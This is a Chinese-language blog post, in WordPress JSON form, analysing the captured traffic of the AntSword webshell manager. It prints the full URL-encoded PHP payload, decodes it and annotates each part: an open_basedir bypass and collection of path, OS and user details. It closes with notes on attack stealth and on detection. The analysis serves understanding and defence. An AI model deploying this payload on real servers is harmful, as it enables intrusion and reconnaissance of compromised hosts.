{"id":1033,"date":"2024-12-15T03:43:26","date_gmt":"2024-12-15T03:43:26","guid":{"rendered":"http:\/\/www.nokws.top\/?p=1033"},"modified":"2024-12-15T03:49:16","modified_gmt":"2024-12-15T03:49:16","slug":"antswordyi","status":"publish","type":"post","link":"http:\/\/www.nokws.top\/index.php\/2024\/12\/15\/antswordyi\/","title":{"rendered":"antsword\uff08\u4e00\uff09"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">0x01 antsword\u5982\u4f55\u8fde\u63a5<\/h3>\n\n\n\n<p>\u901a\u8fc7\u5c06antsword\u4ee3\u7406\u5230bp\u5728\u6293\u5305\uff0c\u53ef\u4ee5\u770b\u5230antsword\u4f20\u9012\u4e86\u4e00\u5806php\u4ee3\u7801\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.nokws.top\/wp-content\/uploads\/2024\/12\/image.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1208\" height=\"671\" data-original=\"http:\/\/www.nokws.top\/wp-content\/uploads\/2024\/12\/image.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1034\"  sizes=\"auto, (max-width: 1208px) 100vw, 1208px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">0x02 \u4ee3\u7801\u8f6c\u6362<\/h3>\n\n\n\n<p>\u539f\u59cb\uff1a<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.88a979108f6d%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2276a3%22.%22b62c1%22%3Becho%20%40asenc(%24output)%3Becho%20%2200%22.%225c2%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B<\/pre>\n\n\n\n<p>=&gt;url\u89e3\u7801=&gt;\u683c\u5f0f\u5316<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">@ini_set(\"display_errors\", \"0\");\n@set_time_limit(0);\n\n$opdir = @ini_get(\"open_basedir\");\n\nif ($opdir) {\n    $ocwd = dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n    $oparr = preg_split(base64_decode(\"Lzt8Oi8=\"), $opdir);\n    @array_push($oparr, $ocwd, sys_get_temp_dir());\n\n    foreach ($oparr as $item) {\n        if (!@is_writable($item)) {\n            continue;\n        }\n\n        $tmdir = $item . \"\/.88a979108f6d\";\n        @mkdir($tmdir);\n\n        if (!@file_exists($tmdir)) {\n            continue;\n        }\n\n        $tmdir = realpath($tmdir);\n        @chdir($tmdir);\n        @ini_set(\"open_basedir\", \"..\");\n\n        $cntarr = @preg_split(\"\/\\\\\\\\|\\\/\/\", $tmdir);\n        for ($i = 0; $i &lt; sizeof($cntarr); $i++) {\n            @chdir(\"..\");\n        }\n\n        @ini_set(\"open_basedir\", \"\/\");\n        @rmdir($tmdir);\n        break;\n    }\n}\n\nfunction asenc($out) {\n    return $out;\n}\n\nfunction asoutput() {\n    $output = ob_get_contents();\n    ob_end_clean();\n    echo \"76a3\" . \"b62c1\";\n    echo @asenc($output);\n    echo \"00\" . \"5c2\";\n}\n\nob_start();\n\ntry {\n    $D = dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n    if ($D == \"\") {\n        $D = dirname($_SERVER[\"PATH_TRANSLATED\"]);\n    }\n\n    $R = \"{$D}\\t\";\n    if (substr($D, 0, 1) != \"\/\") {\n        foreach (range(\"C\", \"Z\") as $L) {\n            if (is_dir(\"{$L}:\")) {\n                $R .= \"{$L}:\";\n            }\n        }\n    } else {\n        $R .= \"\/\";\n    }\n\n    $R .= \"\\t\";\n    $u = (function_exists(\"posix_getegid\")) ? @posix_getpwuid(@posix_geteuid()) : \"\";\n    $s = ($u) ? $u[\"name\"] : @get_current_user();\n    $R .= php_uname();\n    $R .= \"\\t{$s}\";\n\n    echo $R;\n} catch (Exception $e) {\n    echo \"ERROR:\/\/\".$e->getMessage();\n}\n\nasoutput();\ndie();\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x03 \u4ee3\u7801\u5206\u6790<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">@ini_set(\"display_errors\", \"0\");\n@set_time_limit(0);\n\u7981\u7528\u9519\u8bef\u663e\u793a\u548c\u79fb\u9664\u65f6\u95f4\u9650\u5236\n\n$opdir = @ini_get(\"open_basedir\");\n\nif ($opdir) {\n    $ocwd = dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n    $oparr = preg_split(base64_decode(\"Lzt8Oi8=\"), $opdir);\n    @array_push($oparr, $ocwd, sys_get_temp_dir());\n    foreach ($oparr as $item) {\n        if (!@is_writable($item)) {\n            continue;\n        }\n\n        $tmdir = $item . \"\/.88a979108f6d\";\n        @mkdir($tmdir);\n\n        if (!@file_exists($tmdir)) {\n            continue;\n        }\n\n        $tmdir = realpath($tmdir);\n        @chdir($tmdir);\n        @ini_set(\"open_basedir\", \"..\");\n\n        $cntarr = @preg_split(\"\/\\\\\\\\|\\\/\/\", $tmdir);\n        for ($i = 0; $i &lt; sizeof($cntarr); $i++) {\n            @chdir(\"..\");\n        }\n\n        @ini_set(\"open_basedir\", \"\/\");\n        @rmdir($tmdir);\n        break;\n    }\n}\n \u811a\u672c\u901a\u8fc7\u83b7\u53d6 open_basedir \u914d\u7f6e\u7684\u503c\u5e76\u5c1d\u8bd5\u8bbf\u95ee\u5176\u4ed6\u76ee\u5f55\u3002\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u9690\u85cf\u76ee\u5f55\uff0c\u5e76\u901a\u8fc7\u5207\u6362\u5de5\u4f5c\u76ee\u5f55\u6765\u7ed5\u8fc7 open_basedir \u9650\u5236\uff0c\u6700\u540e\u5220\u9664\u4e34\u65f6\u76ee\u5f55\nfunction asenc($out) {\n    return $out;\n}\n\u6ca1\u6709\u8fdb\u884c\u52a0\u89e3\u5bc6\nfunction asoutput() {\n    $output = ob_get_contents();\n    ob_end_clean();\n    echo \"76a3\" . \"b62c1\";\n    echo @asenc($output);\n    echo \"00\" . \"5c2\";\n}\n\u83b7\u53d6\u8f93\u51fa\u7f13\u51b2\u533a\u7684\u5185\u5bb9\u5e76\u8fdb\u884c\u5904\u7406\u3002\u8f93\u51fa\u4e00\u4e9b\u62fc\u63a5\u7684\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32\u4ee5\u53ca\u7ecf\u8fc7 asenc() \u51fd\u6570\u5904\u7406\u7684\u5185\u5bb9\u3002\nob_start();\n\u542f\u52a8\u8f93\u51fa\u7f13\u51b2\u533a\ntry {\n    $D = dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n    if ($D == \"\") {\n        $D = dirname($_SERVER[\"PATH_TRANSLATED\"]);\n    }\n\n    $R = \"{$D}\\t\";\n    if (substr($D, 0, 1) != \"\/\") {\n        foreach (range(\"C\", \"Z\") as $L) {\n            if (is_dir(\"{$L}:\")) {\n                $R .= \"{$L}:\";\n            }\n        }\n    } else {\n        $R .= \"\/\";\n    }\n\n    $R .= \"\\t\";\n    $u = (function_exists(\"posix_getegid\")) ? @posix_getpwuid(@posix_geteuid()) : \"\";\n    $s = ($u) ? $u[\"name\"] : @get_current_user();\n    $R .= php_uname();\n    $R .= \"\\t{$s}\";\n\n    echo $R;\n} catch (Exception $e) {\n    echo \"ERROR:\/\/\".$e->getMessage();\n}\n\u83b7\u53d6\u5f53\u524d\u811a\u672c\u7684\u8def\u5f84\u3001\u64cd\u4f5c\u7cfb\u7edf\u4fe1\u606f\u3001\u5f53\u524d\u7528\u6237\u4fe1\u606f\u5e76\u62fc\u63a5\u6210\u4e00\u4e2a\u5b57\u7b26\u4e32\nasoutput();\ndie();\n\u7ed3\u675f\u811a\u672c<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x04 \u4e00\u4e9b\u601d\u8003<\/h3>\n\n\n\n<p>\u653b\u51fb\uff1a<br>\u6d41\u91cf\u8fc7\u4e8e\u660e\u663e=>\u4f7f\u7528\u52a0\u89e3\u5bc6\u89e3\u51b3\uff1f<br>\u57fa\u4e8ehttp\u7684\u8fde\u63a5=>\u5982\u4f55\u9690\u79d8\u5316<br>\u6267\u884c\u7684\u51fd\u6570\u8fdb\u884c\u7b5b\u9009<br>\u5176\u4ed6\u547d\u4ee4\u7684\u6267\u884c<\/p>\n\n\n\n<p>\u9632\u5fa1\uff1a<br>\u8def\u5f84\u7684\u9632\u5fa1<br>\u5185\u5bb9\u5224\u65ad =>\u672a\u52a0\u5bc6 =>\u6839\u636e\u51fd\u6570\u7b49\u5185\u5bb9<br>               =>\u52a0\u5bc6 =>\u670d\u52a1\u5668\u7aef\u4f7f\u7528rasp\u7b49\u5bf9\u51fd\u6570\u68c0\u6d4b\uff1f<br>\u8fd4\u56de\u5224\u65ad =>\u672a\u52a0\u5bc6 =>\u654f\u611f\u4fe1\u606f\u68c0\u6d4b<br>               =>\u52a0\u5bc6 =>?<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>0x01 antsword\u5982\u4f55\u8fde\u63a5 \u901a\u8fc7\u5c06antsword\u4ee3\u7406\u5230bp\u5728\u6293\u5305\uff0c\u53ef\u4ee5\u770b\u5230antsword\u4f20\u9012\u4e86\u4e00\u5806 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1033","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/1033","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/comments?post=1033"}],"version-history":[{"count":2,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/1033\/revisions"}],"predecessor-version":[{"id":1037,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/1033\/revisions\/1037"}],"wp:attachment":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/media?parent=1033"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/categories?post=1033"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/tags?post=1033"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}